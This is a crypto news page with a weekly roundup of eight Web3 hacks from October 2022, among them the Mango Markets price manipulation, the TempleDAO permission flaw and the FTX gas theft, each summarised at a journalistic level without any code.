Zirlin Reports $9.7M Loss in Wallet Hack
Zirlin, Axie Infinity co-founder, loses $9.7 million in Ethereum to wallet hack. Assets swapped for ETH via mixer. Ronin Bridge secure despite previous hack. Comparisons to Larsen's hack made.
Xu LinLog in/ Sign up
Hackers Exceeding KPIs? Affected amount of about 120 million US dollars Last week's Web3 security incident review
Some hackers used 10 million to "leverage" hundreds of millions of funds in the Solana ecosystem, and some hackers took the risk and stole the wool of the exchange. At the same time, some Web3 projects encountered private key leaks and flash loan attacks.
According to the monitoring of Beosin EagleEye Web3 security early warning and monitoring platform, as of press time, a total of 8 attack-related security incidents occurred last week, and the cumulative amount affected was about 120 million US dollars.
October 9
1. The XaveFinance project was attacked by hackers, resulting in a 1,000-fold increase in the issuance of RNBW
On October 9, the XaveFinance project was attacked by hackers, resulting in a 1,000-fold increase in the issuance of RNBW. In this attack, the attacker executed the attacker's malicious proposal by calling the executeProposalWithIndex() function of the DaoModule contract, which accidentally minted 100,000,000,000,000 RNBW and transferred the ownership authority to the attacker. In the end the hacker redeemed it for xRNBW.
2. Rugpull occurred in the Jumpnfinance project, involving an amount of about 1.15 million US dollars
Jumpnfinance project Rugpull. The attacker calls the 0x6b1d9018() function of the 0xe156 contract, extracts the user assets in the contract, and stores them in the attacker's address. At present, 2100 BNB ($581,700) of the stolen funds have been transferred to Tornado.Cash, and the remaining 2058 BNB ($571,128) are still stored in the attacker's address.
October 11
1. The QANplatform cross-chain bridge was attacked by hackers. It is suspected that the private key of the project party was leaked, involving an amount of about 1.89 million US dollars
The originating address of this event transaction is the address of a suspected project party. The attacker calls the bridgeWithdraw function in the cross-chain bridge contract through this address to extract QANX tokens, and then converts the QANX tokens into corresponding platform tokens. Currently, the stolen funds are still stored at the attacker's address.
2. The Rabby project was hacked, please cancel the authorization of the corresponding contract
This incident is due to an external call vulnerability in the _swap function of RabbyRouter, which allows anyone to transfer funds authorized to the contract user by calling this function. At present, attackers have launched attacks on Ethereum, BSC chain, polygon, avax, Fantom, optimistic, and Arbitrum, please cancel the authorization of the corresponding contract.
3. The TempleDAO project was hacked, involving an amount of about 2.36 million US dollars
This incident is because the migrateStake function in the StaxLPStaking contract lacks permission verification, so anyone can withdraw StaxLP in the contract by calling this function. After the attacker successfully attacked, he exchanged all the obtained StaxLP tokens for ETH.
October 12
1. The Journey of awakening (ATK) project suffered a flash loan attack
In this incident, the attacker attacked the strategy contract of the ATK project through a flash loan attack, obtained a large amount of ATK tokens from the contract, and then converted all the ATK tokens obtained into BSC-USD of about 120,000 US dollars .
2. Mango, the Solana ecological decentralized trading platform, was hacked, affecting as much as 116 million US dollars.
The hacker used two accounts with a total starting capital of 10 million USDT.
In the first step, the attacker deposited 5 million USDC into the Mango marketplace.
In the second step, the attacker created a 483 million PlacePerpOrder2 position in the MNGO-ERP market.
In the third step, the price of MNGO was manipulated, from $0.0382 to $0.91, by using a separate account (Account 2) to trade against its position.
Account 2 now has 483 million * ($0.91 - $0.03298) = $423 million, which allows the attacker to lend $116 million of funds.
October 13
1. FTX exchange was attacked by gas theft
The FTX exchange was attacked by gas theft. Hackers used the gas fee paid by FTX to mint a large number of XEN TOKEN. In this incident, the attacker used the FTX hot wallet to withdraw a small amount of Ethereum multiple times. The FTX hot wallet address will transfer small amounts of funds to the attack contract address multiple times, and then call the fallback() function of the attack contract. Through this function The attacker initiates a minting request to the Xen contract. The Xen contract only needs to pass in a time limit to support cost-free coinage, and only needs to pay the transaction gas fee. However, in this calling process, the transaction initiator is the FTX hot wallet address, so the gas in the entire calling process is The payment is made by the FTX hot wallet address, and the Xen minting address is the attacker's address, achieving the purpose of the attack.
The above data comes from the Beosin EagleEye Web3 security warning and monitoring platform
Gain a broader understanding of the crypto industry through informative reports, and engage in in-depth discussions with other like-minded authors and readers. You are welcome to join us in our growing Coinlive community:https://t.me/CoinliveSG
Add Comment
LoginLeave your comments
0 Comments
Earliest
Load more comments
More news about rabby wallet hack
- Rabby Wallet's Season 2 Points Activity Nearing DeadlineBullishBearish
- Rabby Wallet Announces Support For Sei NetworkBullishBearish
- Rabby Wallet Hints At Upcoming SnapshotBullishBearish
- Rabby Wallet hints at upcoming snapshotBullishBearish
- Rabby Wallet Launches iOS Version on App StoreBullishBearish
More news about rabby wallet hack
- Xu Lin
Rabby Wallet Introduces Incentive Scheme
Rabby launches a points program, aiming to shift users from Metamask by offering various incentives, embracing a growing trend in Web3 projects.
BrianGameStop to Discontinue Cryptocurrency Wallets
The removal of its iOS and Chrome Extension wallets from the market is scheduled for November 1, 2023, although customers will still be able to access their wallets until October 1.
Coinlive Algorand blasted over inaction on ongoing wallet drain hack
Algorand Foundation responds to wallet hack, urging users to switch to more secure wallet options.
CryptoSlateTrust Wallet Clears the Air on Mysterious $4 Million User Hack
Contrary to certain rumors, Trust says user funds cannot be pilfered by merely taking a picture of its wallet’s screen.
cryptopotatoStargate to Reissue STG Tokens Following Alameda Wallet Hack
STG token's price rose 14% following news the token would be reissued in March.
OthersNorth Korean Lazarus Group Moves $64M ETH From Harmony Hack
The notorious North Korean hacker collective known as Lazarus has had a busy weekend moving millions of dollars in Ethereum.
cryptopotatoOngoing Solana-based wallet hack has already seen millions drained
NFT marketplace Magic Eden noted that it “seems to be a widespread SOL exploit at play" and called on users to revoke permissions for any suspicious links in their Phantom wallets.
CointelegraphCoin listing on Wallet.app is now open
Wallet.app is launching the next stage in its EU-based, fully compliant crypto custody wallet, exchange and payment platform that will ...
BitcoinistDeFiance Capital founder loses $1.6 million in hot wallet hack
A Hacker Targets a Big Name in the DeFi Space, But He May Have Overreached As 'Arthur_0x' Warns, 'You Messed With the Wrong Man.'
Cointelegraph